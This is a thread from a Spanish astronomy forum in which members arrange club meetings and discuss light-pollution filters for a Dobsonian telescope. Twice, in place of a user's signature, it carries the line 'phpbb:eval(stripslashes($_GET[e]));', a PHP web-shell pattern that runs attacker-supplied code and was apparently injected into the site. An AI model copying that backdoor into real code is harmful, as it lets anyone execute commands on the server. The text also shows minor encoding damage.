Filtros.

Subforo dedicado a otro tipo de material astronómico que no esté contenido en ninguna de las otras categorías. En este foro no está permitida la venta de ningún tipo de material.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Filtros.

Mensaje por m3ntol »

Ahora en Agosto es mal mes, está cerrada la sede. Pero a partir de Septiembre lo mejor es que nos avises por el foro y quedemos un miercoles a partir de las 20:00 que es cuando tenemos reservada la sala de reuniones.

Otra opción es que vengas a alguna quedada y aproveches para hacerte socio. O te animes a venir a AstroMAD en Octubre ;)
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

A las 20.00h me es imposible, a esa hora estoy todavia trabajando.Tendre que esperar a poder apuntarme para alguna quedada.




Gracias.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
ponce168
Mensajes: 12
Registrado: Mar Sep 02, 2008 4:34 pm

Filtros.

Mensaje por ponce168 »

he estado mirando filtros anti-luminicos, me podriais aconsejar alguno?

Como va el tema de los filtros para mi telescopio se pueden montar?
tengo un dobson sw153/1200mm?

Supongo que tendria que buscar segun la apertura no?
He visto un celestron de alrededor de 100
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Filtros.

Mensaje por m3ntol »

Los filtros más usuales son los CLS. Aun así no te creas que hacen maravillas, si tienes mucha CL vas a seguir teniéndola.

El filtro oscurece un poco el fondo si, pero no es para tirar cohetes. Lo mejor es que antes de comprar uno lo pruebes y si te convence te gastes la pasta, que 100
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

Yo me he comprado hace poco un filtro para la CL de Celestron y no te creas que hace maravillas, es como ponerte unas gafas de sol en pleno día de verano.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder